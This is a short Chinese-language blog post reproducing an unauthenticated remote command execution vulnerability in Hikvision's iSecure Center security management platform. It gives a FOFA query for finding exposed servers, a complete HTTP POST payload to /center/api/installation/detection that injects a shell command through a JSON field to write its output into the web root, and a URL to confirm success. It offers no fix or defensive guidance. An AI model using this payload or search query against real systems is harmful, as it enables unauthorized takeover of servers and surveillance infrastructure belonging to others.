Babing
Published on 2024-08-30 / 4 Visits
0
0

H14-10海康威视-iSecure_Center综合安防管理平台-RCE

H14-10海康威视-iSecure Center综合安防管理平台-RCE

漏洞描述:

海康威视综合安防管理平台 /center/api/installation/detection 接口处存在远程命令执行漏洞,未经身份验证的远程攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。

fofa语法:

app=“HIKVISION-iSecure-Center”

漏洞复现:

将命令执行结果写入文件
payload:

POST /center/api/installation/detection HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36(KHTML, like Gecko) Chrome/105.0.1249.139 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/json;charset=UTF-8

{"type":"environment","operate":"","machines":{"id":  "$(id > /opt/hikvision/web/components/tomcat85linux64.1/webapps/vms/static/1.txt)"}}

效果图:
效果图
验证url
payload:

/vms/static/1.txt

效果图:
效果图


Comment